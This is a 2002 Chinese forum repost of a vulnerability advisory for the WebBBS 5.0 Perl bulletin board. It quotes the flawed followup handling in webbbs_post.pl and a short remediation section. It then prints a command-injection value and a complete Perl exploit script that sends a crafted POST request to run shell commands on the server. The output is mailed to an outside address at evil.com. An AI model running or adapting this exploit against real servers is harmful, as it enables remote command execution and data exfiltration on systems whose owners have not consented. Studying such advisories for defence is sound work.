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[6961] 主题: [漏洞]WebBBS remote command execution |
作者: little (渺小) | ||
标题: [漏洞]WebBBS remote command execution | ||
来自: 203.95.*.* | ||
发贴时间: 2002年07月02日 18:03:23 | ||
长度: 2464字 | ||
WebBBS remote command execution (APP,缺陷)
涉及程序: WebBBS 5.0 (and later versions) 描述: WebBBS 5.0允许攻击者通过web方式远程执行指令 详细: WebBBS是应用较为广泛的,基于web方式的BBS公告版服务程序,以文本方式存储信息。 WebBBS的提交程序webbbs_post.pl允许通过攻击者特殊字符控制web服务器执行非法指令 ,有缺陷的代码段如下: Vulnerable: WebBBS by Darryl Burgdorf ----- webbbs_post.pl: ... if ($FORM{'followup'}) { $followup = "$FORM{'followup'}"; } ... if ($followup) { ... $subdir = "bbs".int($followup/1000); open (FOLLOWUP,"$dir/$subdir/$followup"); ----- 从以上代码分析,如果我们在$followup变量输入时添加特殊字符,将可以执行指令: "followup=10;uname -a|mail zlo@evil.com|" 解决方案: 请关注提供商提供的升级程序: http://awsd.com/scripts/webbbs/ 或者为webbbs_post.pl提供变量检查语句。 攻击方法: Perl攻击脚本: #!/usr/bin/perl # # nerF gr0up # # exploit code for # WebBBS by Darryl C. Burgdorf # all version up to 5.00 are vulnerable # # # this is an exploitation of "followup" bug. # it allows remote attacker to execute shell commands. # you can find WebBBS script at http://awsd.com/scripts/webbbs/ # # 06.06.2002 # btr // nerf # nerf.ru use IO::Socket; srand(); $script = "/cgi-bin/webbbs/webbbs_config.pl"; $command = "uname -a|mail zlo@evil.com"; $host = "localhost"; $port = 80; $content = "$content" . "name=" . rand(254); $content = "$content" . "&email=" . rand(254); $content = "$content" . "&subject=" . rand(254); $content = "$content" . "&body=" . rand(254); $content="$content"."&followup=".rand(254)."|$command|"; $content_length = length($content); $content_type = "application/x-www-form-urlencoded"; if (@ARGV) {$command=@ARGV;} if (@ARGV) {$host=@ARGV;} if (@ARGV) {$script=@ARGV;} $buf = "POST " . "$script" . "?post HTTP/1.0\n"; $buf = "$buf" . "Content-Type: $content_type\r\nContent-Length:"; $buf = "$buf" . "$content_length\r\n\r\n$content", 0; print "\tnerF gr0up\n"; print "exploit: WebBBS (awsd.com), version up to 5.00\n"; print "sent:\n$buf\n"; if($socket = IO::Socket::INET->new("$host:$port")){ print $socket "$buf"; read($socket,$buf,1500); print "recieved:\n$buf\n"; } 附加信息: 无 相关站点: http://awsd.com/scripts/webbbs/ 发布时间:2002年6月20日 |
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